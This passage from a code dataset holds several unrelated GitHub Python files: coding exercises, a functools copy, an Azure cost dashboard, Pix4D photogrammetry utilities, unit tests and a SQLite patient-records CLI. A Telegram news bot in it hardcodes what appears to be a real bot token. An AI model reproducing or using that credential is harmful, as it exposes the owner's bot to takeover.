print(main())\n","repo_name":"tomekrzymyszkiewicz/advent-of-code-2021","sub_path":"day17/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6757117497","text":"m1 = float(input(\"Digite a note M1:\"))\nm2 = float(input(\"Digite a note M2:\"))\nm3 = float(input(\"Didigte a note M3:\"))\n\nmedia = (m1 + m2 + m3) / 3\n\nmediaRound = round(media, 2)\n\nprint(\"\\nNota:\", mediaRound)\n\nif (mediaRound <= 4.0):\n print(\"Reprovado\")\n\nelse:\n if (mediaRound >= 4.1) & (mediaRound <= 6.0):\n print(\"Exame\")\n\n else:\n if (mediaRound > 6.0):\n print(\"Aprovado\")\n\n","repo_name":"wagnerbizarro/python_udemy","sub_path":"2-basico/11-exercicio.py","file_name":"11-exercicio.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38668060199","text":"import logging\n\nimport telegram\n\nimport search\nfrom telegram import Update, ForceReply\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters, ConversationHandler, RegexHandler, CallbackContext\n\n# Enable logging\nlogging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO\n)\n\nlogger = logging.getLogger(__name__)\n\nTOKEN = '5256719525:AAFR0Zouz-j5R-OWLAqES7M2ZVc3QHYYn0o'\n\n\n\ndef start(update: Update, context: CallbackContext) -> None:\n user = update.effective_user\n update.message.reply_markdown_v2(\n fr'Hi {user.mention_markdown_v2()}\\!',\n reply_markup=ForceReply(selective=True)\n )\n\n\n\ndef help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text(text='Use /news command', parse_mode=telegram.ParseMode.HTML)\n\n\ndef news(update:Update, context: CallbackContext)-> None:\n text = search.getNews()\n title = search.getTitle()\n link = search.getLink()\n link_t = 'href=\"{0}\"'.format(link)\n update.message.reply_text(text='{0}'.format(title), parse_mode=telegram.ParseMode.HTML)\n update.message.reply_text(text)\n update.message.reply_text(link)\n\n\n\n#def echo(update: Update, context: CallbackContext):\n # update.message.reply_text(update.message.text)\n\n\ndef main() -> None:\n updater = Updater(TOKEN)\n dispatcher = updater.dispatcher\n\n # on different commands\n dispatcher.add_handler(CommandHandler(\"start\", start))\n dispatcher.add_handler(CommandHandler(\"help\", help_command))\n dispatcher.add_handler(CommandHandler(\"news\", news))\n\n #on non command\n # dispatcher.add_handler(MessageHandler(Filters.text & ~Filters.command, echo))\n\n #start\n updater.start_polling()\n\n updater.idle()\n\n\nif __name__ == '__main__':\n main()","repo_name":"teasec4/heroku-test-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17381180981","text":"\"\"\"\nGiven a sequence of words, check whether it forms a valid word square.\n\nA sequence of words forms a valid word square if the kth row and column read the exact same string, where 0 ≤ k < max(numRows, numColumns).\n\nNote:\nThe number of words given is at least 1 and does not exceed 500.\nWord length will be at least 1 and does not exceed 500.\nEach word contains only lowercase English alphabet a-z.\nExample 1:\n\nInput:\n[\n \"abcd\",\n \"bnrt\",\n \"crmy\",\n \"dtye\"\n]\n\nOutput:\ntrue\n\nExplanation:\nThe first 
row and first column both read \"abcd\".\nThe second row and second column both read \"bnrt\".\nThe third row and third column both read \"crmy\".\nThe fourth row and fourth column both read \"dtye\".\n\nTherefore, it is a valid word square.\nExample 2:\n\nInput:\n[\n \"abcd\",\n \"bnrt\",\n \"crm\",\n \"dt\"\n]\n\nOutput:\ntrue\n\nExplanation:\nThe first row and first column both read \"abcd\".\nThe second row and second column both read \"bnrt\".\nThe third row and third column both read \"crm\".\nThe fourth row and fourth column both read \"dt\".\n\nTherefore, it is a valid word square.\nExample 3:\n\nInput:\n[\n \"ball\",\n \"area\",\n \"read\",\n \"lady\"\n]\n\nOutput:\nfalse\n\nExplanation:\nThe third row reads \"read\" while the third column reads \"lead\".\n\nTherefore, it is NOT a valid word square.\n\"\"\"\n\n\n\"\"\"Solution\n 1. check the words by flip index i and j\n 2. check the len and index\n 3. remember to check every element\n\"\"\"\n\nclass Solution(object):\n def validWordSquare(self, words):\n \"\"\"\n :type words: List[str]\n :rtype: bool\n \"\"\"\n if not words:\n return True\n size = len(words)\n for i in range(size):\n # Error 2: the left boundary should be 0 otherwise the left bottom part would be checked\n for j in range(0, len(words[i])):\n # Error 1: the boundary should be i >= len(words[j])\n # j >= size check the horizontal and i >= len(words[j]) check the vertical\n if j >= size or i >= len(words[j]) or words[i][j] != words[j][i]:\n return False\n return True\n\n\n\n\n\n","repo_name":"bwang8482/LeetCode","sub_path":"Google/422_Valid_Word_Square.py","file_name":"422_Valid_Word_Square.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5699210376","text":"# Baekjoon Online Judge - 1744번. 
Grouping Numbers\n\n\ndef calculate(arr):\n    global max_result\n    length = len(arr)\n    # If the length is odd, the last value is the smallest, so add it on its own \n    if length % 2:\n        for i in range(0, length - 1, 2):\n            max_result += arr[i] * arr[i + 1]\n        max_result += arr[-1]\n    # If the length is even, add the product of each pair\n    else:\n        for i in range(0, length, 2):\n            max_result += arr[i] * arr[i + 1]\n\n\nN = int(input())\nnegative = []\npositive = []\nmax_result = 0\nfor _ in range(N):\n    num = int(input())\n    # By the rule, for 1 adding is what raises the value, so classify positive/negative using 1 as the threshold\n    if num > 1:\n        positive.append(num)\n    elif num == 1:\n        max_result += 1\n    else:\n        negative.append(num)  # 0 also goes into the negative list\n\n# Sort positives in descending order, negatives in ascending order\nnegative.sort()\npositive.sort(reverse=True)\n\ncalculate(negative)\ncalculate(positive)\nprint(max_result)\n","repo_name":"wnstj-yang/Algorithm","sub_path":"BOJ/BOJ_1744.py","file_name":"BOJ_1744.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20459022486","text":"__all__ = ['update_wrapper', 'wraps', 'WRAPPER_ASSIGNMENTS', 'WRAPPER_UPDATES', 'total_ordering', 'cmp_to_key', 'lru_cache', 'reduce', 'partial']\nfrom _functools import partial, reduce\nfrom collections import namedtuple\ntry:\n    from _thread import RLock\nexcept:\n\n    class RLock:\n        __qualname__ = 'RLock'\n\n        def __enter__(self):\n            pass\n\n        def __exit__(self, exctype, excinst, exctb):\n            pass\n\nWRAPPER_ASSIGNMENTS = ('__module__', '__name__', '__qualname__', '__doc__', '__annotations__')\nWRAPPER_UPDATES = ('__dict__',)\n\ndef update_wrapper(wrapper, wrapped, assigned=WRAPPER_ASSIGNMENTS, updated=WRAPPER_UPDATES):\n    wrapper.__wrapped__ = wrapped\n    for attr in assigned:\n        try:\n            value = getattr(wrapped, attr)\n        except AttributeError:\n            pass\n        else:\n            setattr(wrapper, attr, value)\n    for attr in updated:\n        getattr(wrapper, attr).update(getattr(wrapped, attr, {}))\n    return wrapper\n\ndef wraps(wrapped, assigned=WRAPPER_ASSIGNMENTS, updated=WRAPPER_UPDATES):\n    return partial(update_wrapper, wrapped=wrapped, assigned=assigned, updated=updated)\n\ndef total_ordering(cls):\n    convert = {'__lt__': [('__gt__', lambda self, other: not (self < other or self == other)), ('__le__', lambda self, other: self < other or self == other), ('__ge__', lambda self, other: not self < other)], '__le__': [('__ge__', lambda self, other: not self <= other or self == other), ('__lt__', lambda self, other: self <= other and not self == other), ('__gt__', lambda self, other: not self <= other)], '__gt__': [('__lt__', lambda self, other: not (self > other or self == other)), ('__ge__', lambda self, other: self > other or self == other), ('__le__', lambda self, other: not self > other)], '__ge__': [('__le__', lambda self, other: not self >= other or self == other), ('__gt__', lambda self, other: self >= other and not self == other), ('__lt__', lambda self, other: not self >= other)]}\n    roots = [op for op in convert if getattr(cls, op, None) is not getattr(object, op, None)]\n    if not roots:\n        raise ValueError('must define at least one ordering operation: < > <= >=')\n    root = max(roots)\n    for (opname, opfunc) in convert[root]:\n        if opname not in roots:\n            opfunc.__name__ = opname\n            opfunc.__doc__ = getattr(int, opname).__doc__\n            setattr(cls, opname, opfunc)\n    return cls\n\ndef cmp_to_key(mycmp):\n\n    class K(object):\n        __qualname__ = 'cmp_to_key.<locals>.K'\n        __slots__ = ['obj']\n\n        def __init__(self, obj):\n            self.obj = obj\n\n        def __lt__(self, other):\n            return mycmp(self.obj, other.obj) < 0\n\n        def __gt__(self, other):\n            return mycmp(self.obj, other.obj) 
> 0\n\n def __eq__(self, other):\n return mycmp(self.obj, other.obj) == 0\n\n def __le__(self, other):\n return mycmp(self.obj, other.obj) <= 0\n\n def __ge__(self, other):\n return mycmp(self.obj, other.obj) >= 0\n\n def __ne__(self, other):\n return mycmp(self.obj, other.obj) != 0\n\n __hash__ = None\n\n return K\n\ntry:\n from _functools import cmp_to_key\nexcept ImportError:\n pass\n_CacheInfo = namedtuple('CacheInfo', ['hits', 'misses', 'maxsize', 'currsize'])\n\nclass _HashedSeq(list):\n __qualname__ = '_HashedSeq'\n __slots__ = 'hashvalue'\n\n def __init__(self, tup, hash=hash):\n self[:] = tup\n self.hashvalue = hash(tup)\n\n def __hash__(self):\n return self.hashvalue\n\ndef _make_key(args, kwds, typed, kwd_mark=(object(),), fasttypes={int, str, frozenset, type(None)}, sorted=sorted, tuple=tuple, type=type, len=len):\n key = args\n if kwds:\n sorted_items = sorted(kwds.items())\n key += kwd_mark\n for item in sorted_items:\n key += item\n if typed:\n key += tuple(type(v) for v in args)\n if kwds:\n key += tuple(type(v) for (k, v) in sorted_items)\n elif len(key) == 1 and type(key[0]) in fasttypes:\n return key[0]\n return _HashedSeq(key)\n\ndef lru_cache(maxsize=128, typed=False):\n sentinel = object()\n make_key = _make_key\n (PREV, NEXT, KEY, RESULT) = (0, 1, 2, 3)\n\n def decorating_function(user_function):\n cache = {}\n hits = misses = 0\n full = False\n cache_get = cache.get\n lock = RLock()\n root = []\n root[:] = [root, root, None, None]\n if maxsize == 0:\n\n def wrapper(*args, **kwds):\n nonlocal misses\n result = user_function(*args, **kwds)\n misses += 1\n return result\n\n elif maxsize is None:\n\n def wrapper(*args, **kwds):\n nonlocal hits, misses\n key = make_key(args, kwds, typed)\n result = cache_get(key, sentinel)\n if result is not sentinel:\n hits += 1\n return result\n result = user_function(*args, **kwds)\n cache[key] = result\n misses += 1\n return result\n\n else:\n\n def wrapper(*args, **kwds):\n nonlocal hits, root, full, misses\n key = make_key(args, kwds, typed)\n with lock:\n link = cache_get(key)\n if link is not None:\n (link_prev, link_next, _key, result) = link\n link_prev[NEXT] = link_next\n link_next[PREV] = link_prev\n last = root[PREV]\n last[NEXT] = root[PREV] = link\n link[PREV] = last\n link[NEXT] = root\n hits += 1\n return result\n result = user_function(*args, **kwds)\n with lock:\n if key in cache:\n pass\n elif full:\n oldroot = root\n oldroot[KEY] = key\n oldroot[RESULT] = result\n root = oldroot[NEXT]\n oldkey = root[KEY]\n oldresult = root[RESULT]\n root[KEY] = root[RESULT] = None\n del cache[oldkey]\n cache[key] = oldroot\n else:\n last = root[PREV]\n link = [last, root, key, result]\n last[NEXT] = root[PREV] = cache[key] = link\n full = len(cache) >= maxsize\n misses += 1\n return result\n\n def cache_info():\n with lock:\n return _CacheInfo(hits, misses, maxsize, len(cache))\n\n def cache_clear():\n nonlocal hits, misses, full\n with lock:\n cache.clear()\n root[:] = [root, root, None, None]\n hits = misses = 0\n full = False\n\n wrapper.cache_info = cache_info\n wrapper.cache_clear = cache_clear\n return update_wrapper(wrapper, user_function)\n\n return decorating_function\n\n","repo_name":"johndpope/sims4-ai-engine","sub_path":"base/lib/functools.py","file_name":"functools.py","file_ext":"py","file_size_in_byte":7214,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"34674483567","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport dash\r\nimport 
dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Output, Input\r\nimport dash_bootstrap_components as dbc\r\nimport pandas as pd\r\nimport plotly.express as px\r\nfrom datetime import date\r\nimport plotly.graph_objs as go\r\nfrom flask import Flask\r\n\r\n\r\nserver = Flask(__name__)\r\napp = dash.Dash(__name__, server=server)\r\ndf_Azure = pd.read_csv('data/Azure-cost-management-today.csv')\r\n\r\n\r\n\r\n\r\ndef make_lists(df, tag, title):\r\n    radio_list = [html.H4(f'{title}', style={'textAlign':'center'})]\r\n    dic = []\r\n\r\n    for s, c in df[f'{tag}'].value_counts().iteritems():\r\n        dic.append({'label': f'{s} : {c}', 'value' : f'{s}'})\r\n    #print(dic)\r\n    radio_list.append( \r\n        #html.Label(f'{s}', style={'display':'inline', 'fontSize':15}),\r\n        dcc.Dropdown(\r\n            id=f\"my-lists-{tag}\",\r\n            options=dic,\r\n            value=[],\r\n            multi=True, \r\n            style={'width': '600px', 'height' : '100%'}\r\n        ) \r\n    )\r\n    return html.Div(radio_list, style={'textAlign':'left'})\r\n\r\n\r\n\r\n\r\ndef page_html(df, app):\r\n\r\n    today = date.today()\r\n\r\n    app.layout = html.Div([\r\n        dbc.Row([\r\n            dbc.Col(html.H1(f'Cost Management {today}', style={'textAlign':'center'}), width=12)\r\n        ]),\r\n        \r\n        dbc.Row([\r\n            dbc.Col(html.Div(\r\n                className='ikdrow',\r\n                style = {'display' : 'flex'},\r\n                children=[make_lists(df, 'tags', 'Tags'),\r\n                          make_lists(df, 'resource_group', 'Resource Group'),\r\n                          dcc.DatePickerRange(\r\n                            id='my-date-picker-range',\r\n                            min_date_allowed=date(2018, 12, 31),\r\n                            max_date_allowed=today,\r\n                            initial_visible_month=today,\r\n                            end_date=today, \r\n                            start_date = df[\"date\"].min(),\r\n                            style={'width': '100%', 'height' : '30%'}\r\n                        ),\r\n                        html.Div(id='output-container-date-picker-range',\r\n                        children=[html.P(f'Cost : {df[\"cost\"].sum()} euro')]\r\n                        )\r\n                        ]\r\n            ), style = {'textAlign': 'center', 'border':'10px'}\r\n            )\r\n        ]),\r\n        dbc.Row([\r\n            dbc.Col(dcc.Graph(id='my-camonbrt', config={'displayModeBar':True} )),\r\n            \r\n            #dbc.Col(dcc.Graph(id='my-bar', figure=fig_AWS, config={'displayModeBar': False}))\r\n        ]), #, style={'width': '100%', 'height' : '100%'} \r\n        dbc.Row([\r\n            dbc.Col(dcc.Graph(id='my-choropleth', config={'displayModeBar':False}))\r\n            \r\n        ], style={'width': '100%', 'height' : '100%'}) , \r\n    ])\r\n\r\ndef gets_rg(df, length, value):\r\n    # A row holds exactly one resource_group, so chaining '==' tests with '&'\r\n    # (as the original eval-built expression did) could never match more than one\r\n    # name; select rows whose resource_group matches any chosen value instead.\r\n    mask = df['resource_group'].isin(value[:length])\r\n    return df.loc[mask]\r\n
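\r\n# Illustrative call (editor's note; the group names are hypothetical):\r\n#     gets_rg(df_Azure, 2, ['rg-app', 'rg-db'])\r\n# keeps only the rows whose resource_group is one of the two names.\r\n\r\n\r\n@app.callback(\r\n    dash.dependencies.Output('my-camonbrt', 'figure'),\r\n    [dash.dependencies.Input('my-date-picker-range', 'start_date'),\r\n     dash.dependencies.Input('my-date-picker-range', 'end_date'),\r\n     dash.dependencies.Input('my-lists-resource_group', 'value')])\r\ndef update_fig(start_date, end_date, value):\r\n    \r\n    bar_Azure = px.bar(df_Azure, x=\"date\", y=\"cost\", color=\"resource_group\")\r\n    print(value)\r\n    df_tmp = df_Azure\r\n    if len(value) > 0:\r\n        df_tmp = gets_rg(df_Azure, len(value), value)\r\n    print(len(df_tmp))\r\n    if start_date is not None and end_date is not None :\r\n        \r\n        mask = (df_tmp['date'] >= start_date) & (df_tmp['date'] <= end_date) \r\n        df_now = df_tmp.loc[mask]\r\n        #print(df_now.head())\r\n        bar_Azure = px.bar(df_now, x=\"date\", y=\"cost\", color=\"resource_group\")\r\n\r\n\r\n        return bar_Azure \r\n    else :\r\n        return bar_Azure\r\n\r\n\r\n@app.callback(\r\n    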
dash.dependencies.Output('my-choropleth', 'figure'),\r\n    [dash.dependencies.Input('my-date-picker-range', 'start_date'),\r\n     dash.dependencies.Input('my-date-picker-range', 'end_date')])\r\ndef update_pie(start_date, end_date):\r\n    \r\n    pie_Azure = px.pie(df_Azure, values='cost', names='resource_group')\r\n    if start_date is not None and end_date is not None :\r\n\r\n        mask = (df_Azure['date'] >= start_date) & (df_Azure['date'] <= end_date)\r\n        df_now = df_Azure.loc[mask]\r\n\r\n        pie_Azure = px.pie(df_now, values='cost', names='resource_group', title='cost by resource group', hover_data=['resource_group'])\r\n        #pie_Azure = px.pie(df_now, values='cost', names='resource_group')\r\n\r\n        return pie_Azure \r\n    else :\r\n        return pie_Azure\r\n\r\n\r\n@app.callback(\r\n    dash.dependencies.Output('output-container-date-picker-range', 'children'),\r\n    [dash.dependencies.Input('my-date-picker-range', 'start_date'),\r\n     dash.dependencies.Input('my-date-picker-range', 'end_date')])\r\ndef update_output(start_date, end_date):\r\n    \r\n    string_prefix = 'You have selected: '\r\n    if start_date is not None and end_date is not None :\r\n\r\n        mask = (df_Azure['date'] >= start_date) & (df_Azure['date'] <= end_date)\r\n        df_now = df_Azure.loc[mask]\r\n        sum_cost = df_now['cost'].sum()\r\n        string_prefix = f'Cost : {sum_cost} euro'\r\n\r\n        return string_prefix \r\n    else :\r\n        return f'Cost : {df_Azure[\"cost\"].sum()} euro'\r\n\r\ndef main():\r\n    page_html(df_Azure, app)\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n    app.run_server()\r\n\r\n\r\n\"\"\"\r\ndf_AWS = pd.read_csv('data/AWS-cost-management.csv')\r\n\r\nfig_AWS = px.histogram(df_AWS, x=\"lineItem/UsageStartDate\", y=\"lineItem/UnblendedCost\", title=\"AWS : lineItem/UsageStartDate by lineItem/UnblendedCost\")\r\nfig_Azure.update_layout(\r\n    title={\r\n        'text': \"Azure : Date by Cost\",\r\n        'y':0.9,\r\n        'x':0.5,\r\n        'xanchor': 'center',\r\n        'yanchor': 'top'})\r\n\r\n\"\"\"","repo_name":"HSabbar/Cost-Management","sub_path":"dashbord.py","file_name":"dashbord.py","file_ext":"py","file_size_in_byte":6528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34587653056","text":"import pytest\nfrom truck_delivery_atge.db_connector import DBConnector\nfrom truck_delivery_atge.client import Client\nfrom truck_delivery_atge.client_manager import ClientManager\nimport json\n\n\n@pytest.fixture\ndef db_connector(mocker) -> DBConnector:\n    _, client = get_client_mock()\n    db_conn = mocker.Mock(spec=DBConnector)\n    db_conn.save.return_value = True\n    db_conn.get_by_id.return_value = client\n    db_conn.get_all.return_value = [client]\n    db_conn.get_by_pattern.return_value = [client]\n    db_conn.delete_by_id.return_value = True\n    return db_conn\n\n\ndef get_client_mock():\n    ci_test = '123456ci'\n    name = 'testerson'\n    client = Client(\n        ci_test,\n        name,\n        email='test@mail.com',\n        cellphone='+591',\n        address='test',\n        nit='8888',\n        contract_number='12345678')\n    return ci_test, client\n\n\ndef test_save_document(db_connector):\n    ci_test, client = get_client_mock()\n    client_manager = ClientManager(db_connector)\n    result_save = client_manager.save_document(ci_test, client)\n    assert result_save is True\n\n\ndef test_get_document(db_connector):\n    ci_test, client = get_client_mock()\n    client_manager = ClientManager(db_connector)\n    client_manager.save_document(ci_test, client)\n    client_saved = client_manager.get_document(ci_test)\n    assert client.to_dict() == 
client_saved.to_dict()\n\n\ndef test_get_all(db_connector):\n    ci_test, client = get_client_mock()\n    client_manager = ClientManager(db_connector)\n    client_manager.save_document(ci_test, client)\n    all_saved = client_manager.get_all()\n    assert all_saved[0].to_dict() == client.to_dict()\n\n\ndef test_delete(db_connector):\n    ci_test, client = get_client_mock()\n    client_manager = ClientManager(db_connector)\n    client_manager.save_document(ci_test, client)\n    result = client_manager.delete(ci_test)\n    assert result is True\n","repo_name":"ATGE/dev-fundamentals-ii","sub_path":"tests/unit/test_client_manager.py","file_name":"test_client_manager.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9144834131","text":"import pywhatkit\r\nfrom tkinter import *\r\nimport tkinter.messagebox\r\nimport requests \r\n# s = input('Enter a song : ')\r\n# pywhatkit.playonyt(s)\r\n\r\ntk = Tk()\r\ntk.title('Online songs')\r\ntk.geometry('500x300')\r\nlabel = Label(tk, text='Enter the song :',font=('bold',12))\r\nlabel.place(x=150,y=70)\r\nsongtext = StringVar()\r\nsongentry = Entry(tk, textvariable=songtext).place(x=150,y=100)\r\n\r\ndef searchsong():\r\n    song = songtext.get()\r\n    pywhatkit.playonyt(song)\r\n\r\nsearchbutton = Button(tk, text='Search',width=12, command=searchsong).place(x=150,y=150)\r\n\r\ntk.mainloop()","repo_name":"YenaCha/online-songs","sub_path":"song.py","file_name":"song.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37150173894","text":"#\n#\n#  Pix4D.py : plot BBA/AT results produced by Pix4D, read from its 'parameters' folder;\n#             the user supplies necessary configuration data via Tom's Obvious Minimal \n#             Language (TOML) BLOCK_CONFIG.toml\n#  Author  : P.Santitamnont (Phisan.Chula@gmail.com)\n#  Version : 0.3 ( 2022-12-14 )\n#\n#\nimport shutil,re\nfrom pathlib import Path\nfrom shapely.geometry import box,LineString,Polygon\nimport numpy as np \nimport pandas as pd\nimport geopandas as gpd\nimport scipy.optimize \nimport tomli\n\n##########################################################################################\nclass Pix4dBlock:\n    def __init__( self,PIX4D_PATH ):\n        PIX4D_PATH = Path( PIX4D_PATH )\n        with open( PIX4D_PATH.joinpath('BLOCK_INFO.toml'), mode='rb') as fp:\n            self.CONFIG = tomli.load(fp)\n        print( self.CONFIG ) \n        self.CACHE = Path( './CACHE' )\n        self.CACHE.mkdir(parents=True, exist_ok=True)\n        self.BLOCK = self.CACHE.joinpath( './dfPix4dBlock.gpkg' )\n        #import pdb; pdb.set_trace()\n        PROJCS = list( PIX4D_PATH.glob('./1_initial/params/*_wkt.prj') )[0]\n        with open (PROJCS, 'r') as f : self.PROJCS = f.read()\n        #############################################\n        PMATRIX = list(PIX4D_PATH.glob('./1_initial/params/*_pmatrix.txt'))[0]\n        dfPMat = pd.read_csv( PMATRIX, delim_whitespace=True, header=None )\n        def MakeMat( row ):\n            return np.matrix( row[1:13] ).reshape( 3,4 )\n        dfPMat['PMat' ]= dfPMat.apply( MakeMat, axis=1)\n        #############################################\n        dfJPG = pd.DataFrame( list(PIX4D_PATH.glob('./*/*/*.JPG')), columns=['JPG_Path'] )\n        if len(dfJPG)==0: \n            print( '***WARNING*** no directory of JPG images ...')\n        #############################################\n        EXT_PAR = list(PIX4D_PATH.glob('./1_initial/params/*_calibrated_external_camera_parameters.txt'))[0]\n        dfExt = pd.read_csv( EXT_PAR, delim_whitespace=True )\n        dfImage = pd.merge( 
dfExt, dfPMat[[0,'PMat']] , how='inner', left_on='imageName', right_on=0 )\n        #if len(dfJPG)>0:\n        #    dfImage = pd.merge( dfImage, dfJPG , how='inner', left_on='imageName', right_on='ImageName' )\n        self.dfImage = gpd.GeoDataFrame( dfImage, crs='EPSG:32647', \n                geometry=gpd.points_from_xy( dfImage.X, dfImage.Y, dfImage.Z ) )\n        self.dfImage.drop( labels=[0], axis=1, inplace=True )\n        self.dfImage.rename( columns={'imageName': 'ImageName' } ,inplace=True )\n        #import pdb ; pdb.set_trace()\n        def MakeRig( row, self ):\n            ImageStem = row.ImageName.split('.')[0]\n            RigName = re.sub('.*?([0-9]*)$',r'\\1',ImageStem)\n            RigPos = ImageStem[0:-len(RigName)] \n            if RigPos not in self.CONFIG['RIG_POSITION']:\n                raise ValueError(f'***ERROR*** unknown prefix \"{ImageStem}\" ...')\n            return [ ImageStem, row.ImageName , RigName, RigPos ]\n        self.dfImage[ [ 'ImageStem', 'ImageName', 'RigName', 'RigPos' ] ] = \\\n            self.dfImage.apply( MakeRig, axis=1, result_type='expand' , args=(self,) ) \n        self.dfImage.sort_values( by=['RigName','RigPos'], inplace=True )\n        #############################################\n        OFFSET = list( PIX4D_PATH.glob('./1_initial/params/*_offset.xyz') )[0]\n        self.OFFSET = np.matrix( np.loadtxt( OFFSET ) ).T\n\n    def CopyRigImage( self, RIG_NAME ):\n        if type(RIG_NAME) is str: \n            dfIMAGE = self.dfImage[self.dfImage.RigName==RIG_NAME]\n        else: \n            dfIMAGE = RIG_NAME\n        for grp,row in dfIMAGE.groupby( 'RigName' ):\n            CACHE_RIG = self.CACHE.joinpath(f'./{grp}')\n            CACHE_RIG.mkdir(parents=True, exist_ok=True)\n            for _,img in row.iterrows(): \n                src = img.JPG_Path \n                dst = CACHE_RIG.joinpath( img.ImageName )\n                print( f'CopyRigImage: copying {src} to {dst}...' )\n                shutil.copyfile( src, dst ) \n\n    def World2Image( self, IMAGE_STEM, XYZ ):\n        ''' calculate undistorted image coordinate from object coordinate'''\n        df = self.dfImage[ self.dfImage.ImageStem==IMAGE_STEM ]\n        if len(df)!=1:\n            raise Warning( f'***ERROR*** cannot find {IMAGE_STEM} ...')\n        XYZ_ = XYZ - self.OFFSET\n        XYZt = df.iloc[0].PMat * np.vstack( [XYZ_,[[1.]]] )\n        uv = XYZt[0,0]/XYZt[2,0], XYZt[1,0]/XYZt[2,0]\n        return uv\n
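\n    # Projection sketch (editor's note): for the offset-reduced homogeneous point,\n    # World2Image computes [x, y, w]^T = PMat @ [X', Y', Z', 1]^T and returns the\n    # undistorted pixel coordinate (u, v) = (x/w, y/w); Image2World below inverts\n    # this mapping numerically for a known elevation Z.\n    def Image2World( self, IMAGE_STEM, UV, XY_APPROX, Z ):\n        ''' calculate object coordinate XYZ from image (row,col) \n            given Z must be prior known e.g. 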
from DTM '''\n        def Image2World_CB( XY, IMAGE_STEM, UV, Z ):\n            XYZ = np.matrix( [*XY,Z] ).T\n            UV_ = np.array( self.World2Image( IMAGE_STEM, XYZ ) )\n            return UV_-np.array( UV )\n        X,Y = scipy.optimize.fsolve( Image2World_CB, XY_APPROX, \n                            args=( IMAGE_STEM,UV,Z) )\n        return X,Y,Z \n\n#######################################################################################\nif __name__ == \"__main__\":\n    blk = Pix4dBlock( './CA502_MEA_SmallBlock_F2' )\n    df = blk.CopyRigImage( '0734' )\n    print( df )\n    ###################################################\n    Pnt = np.matrix( [717_480.123, 1_606_280.456 , 6.789 ]).T   # meter\n    UV = blk.World2Image( 'S0734', Pnt ) \n    np.set_printoptions(suppress=True)\n    print( f'Input XYZ : {Pnt.T}' )\n    print( f'Output uv : {UV}' )\n    ###################################################\n    xyz = blk.Image2World( 'S0734', UV, \n                [ 717_500,1_606_000 ], Z=6.789 ) \n    print('From image UV to XYZ:\\n', xyz )\n    ###################################################\n\n","repo_name":"phisan-chula/UAV_Research","sub_path":"ObliqueCamera/Pix4D_Lib.py","file_name":"Pix4D_Lib.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"70330271235","text":"\"\"\"\nCSE310 SQL MediLOG Program\nPART 1\n\nThis database stores patient names, birthdays, disability/illness, and a folder date/time creation.\nPurpose: To create a medical database using SQL and Python.\nAudience: Healthcare professionals that need to update/input patient folder data such as:\n\n- Birthdates, illness/Disabilities (updatable).\n- Names, Patient Folder Record Creation (unique - needs to be deleted and put in again if any changes are\nneeded for that specific patient record. See README for more info).\n\n\n\"\"\"\n\nimport sqlite3\n\n# Connect to the database\nconnection = sqlite3.connect('patientrecords.db')\ncursor = connection.cursor()\n\n# Create table (if it does not already exist)\ncursor.execute(\"CREATE TABLE IF NOT EXISTS patients (name TEXT, birthday DATE, illness TEXT, creation REAL)\")\n\ndef get_name(cursor):\n    cursor.execute(\"SELECT name FROM patients\")\n    results = cursor.fetchall()\n    if len(results) == 0:\n        print(\"No names in database\")\n        return None\n    for i in range(len(results)):\n        print(f\"{i+1} - {results[i][0]}\")\n    choice = 0\n    while choice < 1 or choice > len(results):\n        choice = int(input(\"Name ID: \"))\n    return results[choice-1][0]\n\n\nchoice = None\nwhile choice != \"5\":\n    print(\"1) View Patient Folders\")\n    print(\"2) Add Patient Folder\")\n    print(\"3) Update Patient Folder\")\n    print(\"4) Delete Patient Folder\")\n    print(\"5) Quit\")\n    choice = input(\"> \")\n    print()\n    if choice == \"1\":\n        # Display patients\n        cursor.execute(\"SELECT * FROM patients ORDER BY creation ASC \")\n        print(\"{:>20} {:>10} {:>40} {:>40}\".format(\"Name/Middle/Last\", \"Birthday\", \"Disability/Illness\", \"Folder Date Creation\"))\n\n        for record in cursor.fetchall():\n            print(\"{:>20} {:>10} {:>40} {:>40}\".format(record[0], record[1], record[2], record[3]))\n        \n    elif choice == \"2\":\n        # Add New Patient\n        try:\n            name = input(\"Name (i.e. First Middle Last      ): \")\n            birthday = input(\"Birth Date (i.e. YYYY-MM-DD       ): \")\n            dis_ill = input(\"Disability/Illness (i.e. 
